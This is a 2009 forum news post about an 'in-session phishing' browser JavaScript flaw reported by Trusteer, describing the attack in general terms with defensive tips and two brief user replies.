Browser bug increases vulnerability to phishing

rated by 0 users
This post has 2 Replies | 0 Followers

Top 10 Contributor
Posts 26,085
Points 1,183,205
Joined: Sep 2007
News Posted: Tue, Jan 13 2009 12:37 PM

On the heels of the phishing attacks on Twitter and Digg, where all that immediately seemed to be at risk were logon credentials to the social sites, comes a potentially much more insidious problem.

Security vendor Trusteer has found a JavaScript bug in all major browsers makes it easier for crooks to steal your login information while you're doing your online banking. It's called "in-session phishing," and what makes it more difficult to detect is that it happens when you're already logged into your banking site.

The crooks can hack legitimate websites to create a pop-up window to verify your identity when you're already on the site. Security vendor Trusteer found the JavaScript bug in the biggest browsers - Internet Explorer, Firefox, Safari and Chrome. A press release from Trusteer explained how it would work:

A user logs onto their online banking application to perform some tasks. Leaving this browser window open, the user then navigates to other websites. A short time later a popup appears, allegedly from the banking website, which asks the user to retype their username and password because the session has expired, or complete a customer satisfaction survey, or participate in a promotion, etc. Since the user had recently logged onto the banking website, he/she will likely not suspect this popup is fraudulent and thus provide the requested details.

Because the window comes up when you're already on-site, you're more likely to belive it's real. The criminals can determine if you're logged on to one of 100 various banks or other financial institutions via a function in JavaScript, which Klein wouldn't discuss in more detail, because he didn't want to give the bad guys any ideas they didn't have already.

The good news: Trusteer has notified the browser makers and expects them to patch the bug.

And the company also offered these tips, which are common sense, but good advice nonetheless:
1. Deploy web browser security tools
2. Always log out of banking and other sensitive online applications and accounts before navigating to other websites
3. Be extremely suspicious of pop ups that appear in a web session if you have not clicked a hyperlink.

  • | Post Points: 35
Top 500 Contributor
Posts 225
Points 2,395
Joined: Dec 2008
Location: San Antonio
Kiristo replied on Tue, Jan 13 2009 3:29 PM

Opera FTW! Although they probably just didn't mention Opera.

  • | Post Points: 5
Top 10 Contributor
Posts 6,181
Points 90,135
Joined: Aug 2003
Location: United States, Virginia

Can all be avoided bu just looking at the web address. I could see some of my family members falling for this one though.

  • | Post Points: 5
Page 1 of 1 (3 items) | RSS